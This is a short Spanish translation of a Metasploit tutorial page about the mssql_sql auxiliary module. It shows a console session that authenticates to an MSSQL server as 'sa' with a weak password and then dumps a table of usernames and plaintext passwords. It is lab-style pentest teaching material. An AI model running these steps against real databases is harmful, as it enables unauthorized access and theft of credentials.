Mssql/mssql sql
De www.metasploit-es.com.ar
El modulo "mssql_sql" te permite realizar consultas SQL contra una base de datos utilizando credenciales bien conocidos.
msf > use auxiliary/admin/mssql/mssql_sql msf auxiliary(mssql_sql) > show options Module options (auxiliary/admin/mssql/mssql_sql): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port SQL select @@version no The SQL query to execute USERNAME sa no The username to authenticate as
Para configurar este modulo, definimos los valores de PASSWORD y RHOST, y despues el comando SQL deseado, y lo corremos.
msf auxiliary(mssql_sql) > set PASSWORD password1 PASSWORD => password1 msf auxiliary(mssql_sql) > set RHOST 192.168.1.195 RHOST => 192.168.1.195 msf auxiliary(mssql_sql) > set SQL use logins;select * from userpass SQL => use logins;select * from userpass msf auxiliary(mssql_sql) > run [*] SQL Query: use logins;select * from userpass [*] Row Count: 3 (Status: 16 Command: 193) userid username password ------ -------- -------- 1 bjohnson password 2 aadams s3cr3t 3 jsmith htimsj [*] Auxiliary module execution completed msf auxiliary(mssql_sql) >
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
